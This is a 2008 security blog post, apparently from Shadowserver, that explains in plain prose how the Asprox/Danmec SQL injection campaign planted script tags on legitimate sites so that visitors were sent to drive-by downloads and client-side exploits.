« April 2008 · October 2008 · February 2012 »

June 2008
MonTueWedThuFriSatSun
      01
02030405060708
09101112131415
16171819202122
23242526272829
30      
July 2008
MonTueWedThuFriSatSun
 010203040506
07080910111213
14151617181920
21222324252627
28293031   
August 2008
MonTueWedThuFriSatSun
    010203
04050607080910
11121314151617
18192021222324
25262728293031

Calendar:

  • 13.08.2008: Georgian Attacks: Remember Estonia?
  • 12.08.2008: Georgian Websites Under Attack - Don't Believe the Hype
  • 11.08.2008: Georgian Websites Under Attack - DDoS and Defacement
  • 20.07.2008: The Website for the President of Georgia Under Attack - Politically Motivated?
  • 18.07.2008: SQL Injection List Format Update
  • 05.07.2008: See below.
  • 26.06.2008: FIRST Conference - Vancouver, Canada
  • 24.06.2008: FIRST Conference - Vancouver, Canada
  • 04.06.2008: AbuseSec08 Conference - Karlsruhe, Germany
Newest first Oldest first

Saturday, 5 July 2008

SQL Injection, Redirects and Drive-By Downloads, Oh My...

It's been almost 2 months since Shadowserver first posted a bunch of information about large-scale SQL Injection attacks (deemed Asprox / Danmec) which have gained a lot of media coverage (as well as turning up quite the list of involved domains). Awareness is a good thing, in my book.

Since that time what has really surprised me in many of my day-to-day conversations is the number of people who don't understand the nature of the problem. People are saying they were compromised by SQL Injection, but when I dig a little deeper I find that what actually happened was some user went to somegoodsite.com and ended up compromised. If you're one of those people, this blog's for you...

Understanding the Danmec/Asprox Attacks

Basically, the attacker launches an SQL injection attack against somegoodsite.com. SQL injection attacks try to exploit trust relationships between web applications and the databases that support them in order to add, remove or modify data in databases in ways it was never intended. In the case of the Danmec/Asprox attacks, the intent of the SQL injection is to add a single line of HTML code to the database so that somegoodsite.com will present it to every user who visits the site.

The initial code has been an HTML "script" command, which is used to define a segment of code for your browser to run. The difference in the Asprox/Danmec attacks though, is that the code segment to run is malicious javascript hosted at evilsite.net. This is called a drive-by download. Innocent user wasn't targeted directly by the attacker's SQL injection. Instead, innocent user was harmlessly surfing the web during his 1 hour lunch break and got something more than he bargained for from somegoodsite.com.

Evilsite.net then looks at the information presented by innocent user's system and determines that evilsite2.net is hosting an exploit that should be effective. Evilsite.net then issues an IFRAME redirect command telling innocent user's browser to contact evilsite2.net (all without any interaction from innocent user). Finally, evilsite2.net provides a working exploit which compromises innocent user's machine. These compromises can be in the form of keyloggers, botnets, backdoors, or any other nasiness an attacker can drum up. Since this exploit is reliant on innocent user's web client downloading and executing the malicious code on its own, we call this a client-side attack.

So the moral of the story is that somegoodsite.com got compromised by SQL injection. Your users got compromised by redirects, drive-by-downloads and client-side attacks.

=>Posted July 5, 2008, by jason aka dn1nj4 at shadowserver dot org